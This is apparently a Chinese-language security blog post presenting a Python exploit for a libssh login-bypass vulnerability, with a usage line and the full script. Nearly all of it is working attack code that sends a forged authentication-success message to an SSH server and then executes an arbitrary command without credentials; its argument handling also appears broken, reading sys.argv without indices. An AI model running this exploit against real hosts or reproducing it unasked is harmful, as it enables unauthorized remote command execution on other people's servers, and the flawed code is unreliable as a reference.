VULNSPYBlOGQQ 群TELEGRAM GROUPYOUTUBE CHANNEL Libssh 登录绕过漏洞利用 (CVE-20...
漏洞利用
脚本使用方法:
python vulnspy_libssh.py target.com 端口 '命令'
测试脚本:
#!/usr/bin/env python
import paramiko
import socket
import argparse
import logging
import sys
import time
import datetime
def BypasslibSSHwithoutcredentials(hostname, port, cmd):
sock = socket.socket()
try:
#logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
sock.connect((str(hostname), int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
# ref:http://joelinoff.com/blog/?p=905
session = transport.open_session()
session.exec_command(cmd)
data = ''
maxseconds = 5
start = datetime.datetime.now()
start_secs = time.mktime(start.timetuple())
while True:
if session.recv_ready():
data = data+session.recv(2048)
if session.exit_status_ready():
break
now = datetime.datetime.now()
now_secs = time.mktime(now.timetuple())
et_secs = now_secs - start_secs
if et_secs > maxseconds:
data = data+'\ntimeout'
break
print data
return 0
except paramiko.SSHException as e:
print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
return 1
except socket.error:
print("Unable to connect.")
return 1
def main():
try:
hostname = sys.argv
port = sys.argv
cmd = sys.argv
except:
print("Usage: python vulnspy_libssh.py target.vsplate.me 2222 'curl www.vulnspy.com'")
exit(1)
BypasslibSSHwithoutcredentials(hostname, port, cmd)
if __name__ == '__main__':
exit(main())
页:
[1]